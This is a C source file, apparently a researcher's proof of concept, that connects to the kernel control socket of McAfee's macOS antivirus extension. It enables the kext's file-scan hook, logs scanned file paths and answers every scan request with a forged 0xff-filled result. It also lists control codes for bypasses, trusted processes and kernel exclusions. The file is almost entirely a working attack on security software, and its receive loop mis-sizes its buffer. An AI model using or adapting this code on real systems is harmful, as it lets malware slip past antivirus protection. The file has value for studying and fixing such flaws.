//// main.c// AVControl//// Created by User1 on 10/15/18.// Copyright ©

1. //
2. // main.c
3. // AVControl
4. //
5. // Created by User1 on 10/15/18.
6. // Copyright © 2018 Scott Knight. All rights reserved.
7. //
8.  
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <sys/socket.h>
12. #include <sys/kern_control.h>
13. #include <strings.h>
14. #include <sys/ioctl.h>
15. #include <sys/sys_domain.h>
16. #include <unistd.h>
17. #include <pthread.h>
18.  
19. int ENABLE_KERNEL_HOOK = 1;
20. int DISABLE_KERNEL_HOOK = 2;
21. int PUT_SCAN_RESULT_MSG = 4;
22. int PUT_SCAN_TIME_OUT = 5;
23. int PING_KEXT = 6;
24. int GENERATE_BYPASS = 7;
25. int SCAN_RW_POLICY = 8;
26. int ADD_TRUSTED_PROCESS = 13;
27. int FLUSH_TRUSTED_PROCESS = 14;
28. int INVALIDATE_BOOSTER_CACHE = 15;
29. int ENABLE_BOOSTER_CACHE = 16;
30. int SET_LOG_LEVEL = 17;
31. int CLEAR_DEVICE_ENTRIES = 18;
32. int SET_KERNEL_EXCLUSIONS = 19;
33. int CLEAR_KERNEL_EXCLUSIONS = 20;
34.  
35. #define MYCONTROLNAME "com.McAfee.AVKext"
36.  
37. int fd;
38.  
39. void* ping(void* data)
40. {
41. for (;;) {
42. int result = setsockopt(fd, SYSPROTO_CONTROL, PING_KEXT, NULL, 0);
43. if (result){
44. fprintf(stderr, "setsockopt failed on PING_KEXT call - result was %d\n", result);
45. }
46. sleep(50);
47. }
48. }
49.  
50. void print_hex_memory(void *mem) {
51. int i;
52. unsigned char *p = (unsigned char *)mem;
53. for (i=0;i<128;i++) {
54. printf("%02x", p[i]);
55. if ((i%16==0) && i)
56. printf("\n");
57. }
58. printf("\n\n\n\n");
59. }
60.  
61. int main(int argc, const char * argv[]) {
62. struct sockaddr_ctl addr;
63.  
64. fd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
65. if (fd != -1) {
66. bzero(&addr, sizeof(addr)); // sets the sc_unit field to 0
67. addr.sc_len = sizeof(addr);
68. addr.sc_family = AF_SYSTEM;
69. addr.ss_sysaddr = AF_SYS_CONTROL;
70.  
71. struct ctl_info info;
72. memset(&info, 0, sizeof(info));
73. strncpy(info.ctl_name, MYCONTROLNAME, sizeof(info.ctl_name));
74. if (ioctl(fd, CTLIOCGINFO, &info)) {
75. perror("Could not get ID for kernel control.\n");
76. exit(-1);
77. }
78. addr.sc_id = info.ctl_id;
79. addr.sc_unit = 0;
80.  
81.  
82. int result = connect(fd, (struct sockaddr *)&addr, sizeof(addr));
83. if (result) {
84. fprintf(stderr, "connect failed %d\n", result);
85. } else {
86. pthread_t p_thread1;
87. int a = 1;
88. pthread_create(&p_thread1, NULL, ping, (void*)&a);
89.  
90.  
91. int result = setsockopt(fd, SYSPROTO_CONTROL, ENABLE_KERNEL_HOOK, NULL, 0);
92. if (result){
93. fprintf(stderr, "setsockopt failed on ENABLE_KERNEL_HOOK call - result was %d\n", result);
94. }
95.  
96. char buffer[1080000]; // or whatever you like, but best to keep it large
97. int count = 0;
98. int total = 0;
99.  
100. for (;;) {
101. while ((count = recv(fd, &buffer[total], sizeof buffer - count, 0)) > 0)
102. {
103. total += count;
104. // At this point the buffer is valid from 0..total-1, if that's enough then process it and break, otherwise continue
105. char *file = &buffer[48];
106. printf("%s\n", file);
107. // print_hex_memory(buffer);
108.  
109. char file_scan_message[1088];
110. for (int i = 0; i < 1088; i++) {
111. file_scan_message[i] = 0xff;
112. }
113. int result = setsockopt(fd, SYSPROTO_CONTROL, PUT_SCAN_RESULT_MSG, file_scan_message, 1088);
114. if (result){
115. fprintf(stderr, "setsockopt failed on PUT_SCAN_RESULT_MSG call - result was %d\n", result);
116. }
117. }
118. if (count == -1)
119. {
120. perror("recv");
121. break;
122. }
123. else if (count == 0)
124. {
125. // EOS on the socket: close it, exit the thread, etc.
126. break;
127. }
128. }
129. }
130. } else { /* no fd */
131. fprintf(stderr, "failed to open socket\n");
132. }
133.  
134. return 0;
135. }